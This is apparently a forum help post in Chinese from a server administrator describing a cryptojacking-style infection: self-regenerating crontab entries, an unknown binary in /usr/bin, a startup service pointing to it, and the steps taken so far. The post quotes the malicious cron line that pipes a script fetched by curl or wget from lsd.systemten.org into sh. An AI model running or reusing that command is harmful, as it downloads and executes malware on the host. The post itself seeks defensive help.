- top无占用大量CPU的进程,内存正常。
- 目前只有crontab相关文件里面存在脚本命令(如/var/spool/cron/root; /var/spool/cron/crontabs/root; /etc/crontab; /etc/cron.d/root; /etc/bashrc ) # */30 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
- crontab -l 查看有个定时任务,删不掉,2中的文件无法删除,即使删除也会再次生成。 # (*/15 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh)
- 按照定时任务crul网址打开的是个脚本:
- 发现病毒文件/usr/bin/b1e06d5d739eeb,不知是什么文件,打开乱码,即使删除也会再次生成。
- 开机自启项有sshservice文件,改文件有配置指向/usr/bin/b1e06d5d739eeb
8. 亡羊补牢,目前已经关闭redis,做了端口和IP限制,改了ssh端口和密码,停用了curl和wget命令,伪造假文件/usr/bin/b1e06d5d739eeb(伪造的文件一直为空),但是一直找不到该病毒的进程和脚本位置,希望大佬们帮忙分析~